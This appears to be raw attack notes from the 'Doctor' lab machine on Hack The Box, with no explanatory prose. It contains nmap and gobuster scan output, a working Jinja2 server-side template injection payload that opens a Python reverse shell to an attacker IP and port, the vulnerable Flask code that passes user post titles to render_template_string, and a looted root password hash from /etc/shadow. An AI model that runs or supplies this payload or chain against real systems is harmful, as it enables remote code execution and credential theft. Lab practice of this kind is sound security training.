Doctor

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-02 09:27 EST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.45% done; ETC: 09:29 (0:01:20 remaining)
Nmap scan report for 10.10.10.209
Host is up (0.032s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http
|_http-title: Doctor
8089/tcp open  unknown
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27

Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.209:8089
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/02 09:33:15 Starting gobuster
===============================================================
/services (Status: 401)
/v2 (Status: 200)
/v1 (Status: 200)
/v3 (Status: 200)
/v4 (Status: 200)
/v5 (Status: 200)
/v6 (Status: 200)
/v7 (Status: 200)
/v8 (Status: 200)
/v10 (Status: 200)
/v11 (Status: 200)
/v15 (Status: 200)
/v0 (Status: 200)
/v01 (Status: 200)
/v52 (Status: 200)
/v001 (Status: 200)
/v23 (Status: 200)
/v9 (Status: 200)
/v14 (Status: 200)
/v20 (Status: 200)
/v05 (Status: 200)
/v13 (Status: 200)
/v12 (Status: 200)
/v92 (Status: 200)
/v003 (Status: 200)
/v209 (Status: 200)
===============================================================
2020/12/02 09:34:19 Finished
===============================================================

[+] Url:            http://doctors.htb
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/02 10:07:32 Starting gobuster
===============================================================
/account (Status: 302)
/logout (Status: 302)
/archive (Status: 200)
/login (Status: 200)
/register (Status: 200)
/home (Status: 302)
/reset_password (Status: 200)
===============================================================
2020/12/02 10:12:18 Finished
===============================================================

<div data-gb-custom-block data-tag="for"><div data-gb-custom-block data-tag="if" data-0='warning'>{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.131\",3254));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\"]);'").read().zfill(417)}}</div></div>

from flask import render_template, render_template_string, request, Blueprint
from flask_login import current_user, login_required
from flaskblog.models import Post

main = Blueprint('main', __name__)


@main.route("/")
@main.route("/home")
@login_required
def home():
        page = request.args.get('page', 1, type=int)
        posts = Post.query.order_by(Post.date_posted.asc()).paginate(page=page, per_page=10)
        return render_template('home.html', posts=posts, author=current_user)


@main.route("/archive")
def feed():
        posts = Post.query.order_by(Post.date_posted.asc())
        tpl = '''
        <?xml version="1.0" encoding="UTF-8" ?>
        <rss version="2.0">
        <channel>
        <title>Archive</title>
        '''
        for post in posts:
                if post.author==current_user:
                        tpl += "<item><title>"+post.title+"</title></item>\n"
                        tpl += '''
                        </channel>
                        '''
        return render_template_string(tpl)

[+] Users with console
root:x:0:0:root:/root:/bin/bash
shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
splunk:x:1003:1003:Splunk Server:/opt/splunkforwarder:/bin/bash
web:x:1001:1001:,,,:/home/web:/bin/bash

root:$6$384TbSO3bB1PWLT1$U8U.j.zBLXobhorPDxOMRZh4eE86lcn7C0dvqRvfJ9qDzreti8HDvXwFZccDat9/HJRNwu04ErVxo3mUwVbs5.:18512:0:99999:7:::